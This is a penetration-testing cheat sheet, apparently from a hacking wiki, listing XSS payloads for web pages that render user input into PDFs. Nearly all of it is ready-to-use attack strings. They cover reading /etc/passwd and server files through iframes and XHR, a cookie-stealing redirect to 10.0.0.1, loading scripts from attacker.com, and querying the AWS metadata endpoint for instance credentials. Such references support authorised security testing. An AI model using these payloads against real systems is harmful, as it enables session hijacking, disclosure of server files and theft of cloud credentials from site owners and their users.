XSS with Dynamic PDF

If the PDF file, which is created somewhere in the website, that is reflected our payloads, we can insert malicious code.

Basic

<img src='x' onerror="document.write('test')">
<script>document.write('test')</script>

"><h1>XSS</h1>

Path Disclosure

<img src='x' onerror="document.write(JSON.stringify(window.location))">
<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>

LFI/RFI

<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>
<iframe src="http://localhost/server-status" height="1000" width="1000"></iframe>

<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">

LFI/RFI (XHR request)

<script>
    x = new XMLHttpRequest();
    x.onload = function() {
        document.write(this.responseText)
    };
    x.open("GET", "file:///etc/passwd");
    x.send();
</script>

<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">

External Scripts

<script src="http://attacker.com/test.js"></script>

<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />

AWS Instances

<iframe src="http://169.254.169.254/latest/dynamic/instance-identity/" height=1000px width=1000px></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" height=1000px width=1000px></iframe>

wkhtmltopdf

If the website uses “wkhtmltopdf”, please also refer to this page.

References

HackTricks

PreviousXSS (Cross-Site Scripting)NextXST (Cross-Site Tracing)

Last updated 1 month ago

hashtagXSS with Dynamic PDF

hashtagBasic

hashtagPath Disclosure

hashtagLFI/RFI

hashtagLFI/RFI (XHR request)

hashtagCookie Hijacking

hashtagExternal Scripts

hashtagAWS Instances

hashtagwkhtmltopdf

hashtagReferences